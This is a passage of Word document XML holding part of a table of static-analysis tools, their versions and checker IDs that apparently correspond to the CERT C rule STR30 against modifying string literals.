              </w:rPr>
              <w:t>Description Tool</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00D5201D" w14:paraId="6FA80FB9" w14:textId="77777777" w:rsidTr="00001F14">
        <w:trPr>
          <w:trHeight w:val="460"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1807" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="6EAD09E8" w14:textId="2163473D" w:rsidR="00D5201D" w:rsidRDefault="00000000" w:rsidP="00D5201D">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:hyperlink r:id="rId47" w:history="1">
              <w:r w:rsidR="00D5201D">
                <w:rPr>
                  <w:rStyle w:val="Hyperlink"/>
                  <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
                  <w:color w:val="0052CC"/>
                  <w:sz w:val="21"/>
                  <w:szCs w:val="21"/>
                </w:rPr>
                <w:t>Astrée</w:t>
              </w:r>
            </w:hyperlink>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1341" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="7F61FE04" w14:textId="78B0AF39" w:rsidR="00D5201D" w:rsidRDefault="00D5201D" w:rsidP="00D5201D">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="conf-macro"/>
                <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
                <w:color w:val="172B4D"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>24.04</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4021" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="6D5ADFA7" w14:textId="2D3F0329" w:rsidR="00D5201D" w:rsidRDefault="00D5201D" w:rsidP="00D5201D">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="Strong"/>
                <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
                <w:color w:val="172B4D"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>string-literal-</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="Strong"/>
                <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
                <w:color w:val="172B4D"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>modfication</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
                <w:color w:val="172B4D"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:br/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="Strong"/>
                <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
                <w:color w:val="172B4D"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>write-to-string-literal</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3611" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="524301C7" w14:textId="656913A2" w:rsidR="00D5201D" w:rsidRDefault="00D5201D" w:rsidP="00D5201D">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
                <w:color w:val="172B4D"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>Fully checked</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00D5201D" w14:paraId="68DCBF3C" w14:textId="77777777" w:rsidTr="00001F14">
        <w:trPr>
          <w:trHeight w:val="460"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1807" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="19062B0B" w14:textId="0B232298" w:rsidR="00D5201D" w:rsidRDefault="00000000" w:rsidP="00D5201D">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:hyperlink r:id="rId48" w:history="1">
              <w:proofErr w:type="spellStart"/>
              <w:r w:rsidR="00D5201D">
                <w:rPr>
                  <w:rStyle w:val="Hyperlink"/>
                  <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
                  <w:color w:val="0052CC"/>
                  <w:sz w:val="21"/>
                  <w:szCs w:val="21"/>
                </w:rPr>
                <w:t>Axivion</w:t>
              </w:r>
              <w:proofErr w:type="spellEnd"/>
              <w:r w:rsidR="00D5201D">
                <w:rPr>
                  <w:rStyle w:val="Hyperlink"/>
                  <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
                  <w:color w:val="0052CC"/>
                  <w:sz w:val="21"/>
                  <w:szCs w:val="21"/>
                </w:rPr>
                <w:t xml:space="preserve"> Bauhaus Suite</w:t>
              </w:r>
            </w:hyperlink>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1341" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="1CAE0AAF" w14:textId="5DF2D48B" w:rsidR="00D5201D" w:rsidRDefault="00D5201D" w:rsidP="00D5201D">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="conf-macro"/>
                <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
                <w:color w:val="172B4D"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>7.2.0</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4021" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="5BDC8C34" w14:textId="47D0C298" w:rsidR="00D5201D" w:rsidRDefault="00D5201D" w:rsidP="00D5201D">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="Strong"/>
                <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
                <w:color w:val="172B4D"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>CertC-STR30</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3611" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="36FB7C4F" w14:textId="2EC622DA" w:rsidR="00D5201D" w:rsidRDefault="00D5201D" w:rsidP="00D5201D">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
                <w:color w:val="172B4D"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>Fully implemented</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00D5201D" w14:paraId="499FC42E" w14:textId="77777777" w:rsidTr="00001F14">
        <w:trPr>
          <w:trHeight w:val="460"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1807" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="6382C165" w14:textId="0233D2AD" w:rsidR="00D5201D" w:rsidRDefault="00000000" w:rsidP="00D5201D">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:hyperlink r:id="rId49" w:history="1">
              <w:r w:rsidR="00D5201D">
                <w:rPr>
                  <w:rStyle w:val="Hyperlink"/>
                  <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
                  <w:color w:val="0052CC"/>
                  <w:sz w:val="21"/>
                  <w:szCs w:val="21"/>
                </w:rPr>
                <w:t>Compass/ROSE</w:t>
              </w:r>
            </w:hyperlink>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1341" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="2A421CD4" w14:textId="77777777" w:rsidR="00D5201D" w:rsidRDefault="00D5201D" w:rsidP="00D5201D">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4021" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="4558C263" w14:textId="77777777" w:rsidR="00D5201D" w:rsidRDefault="00D5201D" w:rsidP="00D5201D">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3611" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="792633D7" w14:textId="1925E348" w:rsidR="00D5201D" w:rsidRDefault="00D5201D" w:rsidP="00D5201D">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
                <w:color w:val="172B4D"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>Can detect simple violations of this rule</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00D5201D" w14:paraId="60299126" w14:textId="77777777" w:rsidTr="00001F14">
        <w:trPr>
          <w:trHeight w:val="460"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1807" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="4F67120F" w14:textId="5D8D0FFB" w:rsidR="00D5201D" w:rsidRDefault="00000000" w:rsidP="00D5201D">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:hyperlink r:id="rId50" w:history="1">
              <w:r w:rsidR="00D5201D">
                <w:rPr>
                  <w:rStyle w:val="Hyperlink"/>
                  <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
                  <w:color w:val="0052CC"/>
                  <w:sz w:val="21"/>
                  <w:szCs w:val="21"/>
                </w:rPr>
                <w:t>Coverity</w:t>
              </w:r>
            </w:hyperlink>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1341" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="402CB100" w14:textId="07AB0454" w:rsidR="00D5201D" w:rsidRDefault="00D5201D" w:rsidP="00D5201D">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="conf-macro"/>
                <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
                <w:color w:val="172B4D"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>2017.07</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4021" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="0D8F27E4" w14:textId="46D1AC75" w:rsidR="00D5201D" w:rsidRDefault="00D5201D" w:rsidP="00D5201D">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="Strong"/>
                <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
                <w:color w:val="172B4D"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>PW</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3611" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="47FA15F7" w14:textId="74D1E934" w:rsidR="00D5201D" w:rsidRDefault="00D5201D" w:rsidP="00D5201D">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
                <w:color w:val="172B4D"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>Deprecates conversion from a string literal to "char *"</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00D5201D" w14:paraId="73DAB152" w14:textId="77777777" w:rsidTr="00001F14">
        <w:trPr>
          <w:trHeight w:val="460"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1807" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="39F0D11B" w14:textId="114D1231" w:rsidR="00D5201D" w:rsidRDefault="00000000" w:rsidP="00D5201D">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:hyperlink r:id="rId51" w:history="1">
              <w:r w:rsidR="00D5201D">
                <w:rPr>
                  <w:rStyle w:val="Hyperlink"/>
                  <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
                  <w:color w:val="0052CC"/>
                  <w:sz w:val="21"/>
                  <w:szCs w:val="21"/>
                </w:rPr>
                <w:t>Helix QAC</w:t>
              </w:r>
            </w:hyperlink>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1341" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="6692C9F4" w14:textId="5680A2F0" w:rsidR="00D5201D" w:rsidRDefault="00D5201D" w:rsidP="00D5201D">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="conf-macro"/>
                <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
                <w:color w:val="172B4D"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>2024.1</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4021" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="7A12EC9A" w14:textId="77777777" w:rsidR="00D5201D" w:rsidRDefault="00D5201D" w:rsidP="00D5201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262626"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>C0556, C0752, C0753, C0754</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="285A8AFB" w14:textId="430BC762" w:rsidR="00D5201D" w:rsidRDefault="00D5201D" w:rsidP="00D5201D">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="Strong"/>
                <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
                <w:color w:val="172B4D"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>C++3063, C++3064, C++3605, C++3606, C++3607</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3611" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="349283E5" w14:textId="35ECC2C2" w:rsidR="00D5201D" w:rsidRDefault="00D5201D" w:rsidP="00D5201D">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00D5201D" w14:paraId="6E5B3792" w14:textId="77777777" w:rsidTr="00001F14">
        <w:trPr>
          <w:trHeight w:val="460"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1807" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="589FB6C9" w14:textId="56F8633E" w:rsidR="00D5201D" w:rsidRDefault="00000000" w:rsidP="00D5201D">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:hyperlink r:id="rId52" w:history="1">
              <w:proofErr w:type="spellStart"/>
              <w:r w:rsidR="00D5201D">
                <w:rPr>
                  <w:rStyle w:val="Hyperlink"/>
                  <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
                  <w:color w:val="0052CC"/>
                  <w:sz w:val="21"/>
                  <w:szCs w:val="21"/>
                </w:rPr>
                <w:t>Klocwork</w:t>
              </w:r>
              <w:proofErr w:type="spellEnd"/>
            </w:hyperlink>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1341" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="023423AD" w14:textId="12042867" w:rsidR="00D5201D" w:rsidRDefault="00D5201D" w:rsidP="00D5201D">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="conf-macro"/>
                <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
                <w:color w:val="172B4D"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>2024.1</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4021" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="2549517B" w14:textId="448EB9F4" w:rsidR="00D5201D" w:rsidRDefault="00D5201D" w:rsidP="00D5201D">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="Strong"/>
                <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
                <w:color w:val="172B4D"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>CERT.STR.ARG.CONST_TO_NONCONST</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
                <w:color w:val="172B4D"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:br/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="Strong"/>
                <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
                <w:color w:val="172B4D"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>CERT.STR.ASSIGN.CONST_TO_NONCONST</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3611" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="08C7A6EB" w14:textId="77777777" w:rsidR="00D5201D" w:rsidRDefault="00D5201D" w:rsidP="00D5201D">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00D5201D" w14:paraId="773A715D" w14:textId="77777777" w:rsidTr="00001F14">
        <w:trPr>
          <w:trHeight w:val="460"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1807" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="768ED0B0" w14:textId="3280AADF" w:rsidR="00D5201D" w:rsidRDefault="00000000" w:rsidP="00D5201D">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:hyperlink r:id="rId53" w:history="1">
              <w:r w:rsidR="00D5201D">
                <w:rPr>
                  <w:rStyle w:val="Hyperlink"/>
                  <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
                  <w:color w:val="0052CC"/>
                  <w:sz w:val="21"/>
                  <w:szCs w:val="21"/>
                </w:rPr>
                <w:t>LDRA tool suite</w:t>
              </w:r>
            </w:hyperlink>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1341" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="5FE8FA2E" w14:textId="0D27EFB4" w:rsidR="00D5201D" w:rsidRDefault="00D5201D" w:rsidP="00D5201D">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="conf-macro"/>
                <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
                <w:color w:val="172B4D"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>9.7.1</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4021" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="07D29580" w14:textId="502372D4" w:rsidR="00D5201D" w:rsidRDefault="00D5201D" w:rsidP="00D5201D">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="Strong"/>
                <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
                <w:color w:val="172B4D"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>157 S</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3611" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="34BDFA5C" w14:textId="7AF90FD2" w:rsidR="00D5201D" w:rsidRDefault="00D5201D" w:rsidP="00D5201D">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
                <w:color w:val="172B4D"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>Partially implemented</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00D5201D" w14:paraId="534695B6" w14:textId="77777777" w:rsidTr="00001F14">
        <w:trPr>
          <w:trHeight w:val="460"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1807" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="34F4CCEB" w14:textId="3FE0DF34" w:rsidR="00D5201D" w:rsidRDefault="00000000" w:rsidP="00D5201D">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:hyperlink r:id="rId54" w:history="1">
              <w:proofErr w:type="spellStart"/>
              <w:r w:rsidR="00D5201D">
                <w:rPr>
                  <w:rStyle w:val="Hyperlink"/>
                  <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
                  <w:color w:val="0052CC"/>
                  <w:sz w:val="21"/>
                  <w:szCs w:val="21"/>
                </w:rPr>
                <w:t>Parasoft</w:t>
              </w:r>
              <w:proofErr w:type="spellEnd"/>
              <w:r w:rsidR="00D5201D">
                <w:rPr>
                  <w:rStyle w:val="Hyperlink"/>
                  <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
                  <w:color w:val="0052CC"/>
                  <w:sz w:val="21"/>
                  <w:szCs w:val="21"/>
                </w:rPr>
                <w:t xml:space="preserve"> C/C++test</w:t>
              </w:r>
            </w:hyperlink>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1341" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="2E661E73" w14:textId="30DFA7BB" w:rsidR="00D5201D" w:rsidRDefault="00D5201D" w:rsidP="00D5201D">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="conf-macro"/>
                <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
                <w:color w:val="172B4D"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>2023.1</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4021" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="1EAAFBC5" w14:textId="0F32829C" w:rsidR="00D5201D" w:rsidRDefault="00D5201D" w:rsidP="00D5201D">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="Strong"/>
                <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
                <w:color w:val="172B4D"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>CERT_C-STR30-a</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
                <w:color w:val="172B4D"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:br/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="Strong"/>
                <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
                <w:color w:val="172B4D"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>CERT_C-STR30-b</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3611" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="20896DD0" w14:textId="1FC94DB3" w:rsidR="00D5201D" w:rsidRDefault="00D5201D" w:rsidP="00D5201D">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
                <w:color w:val="172B4D"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>A string literal shall not be modified</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
                <w:color w:val="172B4D"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:br/>
              <w:t>Do not modify string literals</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00D5201D" w14:paraId="10BB2DD3" w14:textId="77777777" w:rsidTr="00001F14">
        <w:trPr>
          <w:trHeight w:val="460"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1807" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="54BBED36" w14:textId="08B69A42" w:rsidR="00D5201D" w:rsidRDefault="00000000" w:rsidP="00D5201D">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:hyperlink r:id="rId55" w:history="1">
              <w:r w:rsidR="00D5201D">
                <w:rPr>
                  <w:rStyle w:val="Hyperlink"/>
                  <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
                  <w:color w:val="0052CC"/>
                  <w:sz w:val="21"/>
                  <w:szCs w:val="21"/>
                </w:rPr>
                <w:t>PC-lint Plus</w:t>
              </w:r>
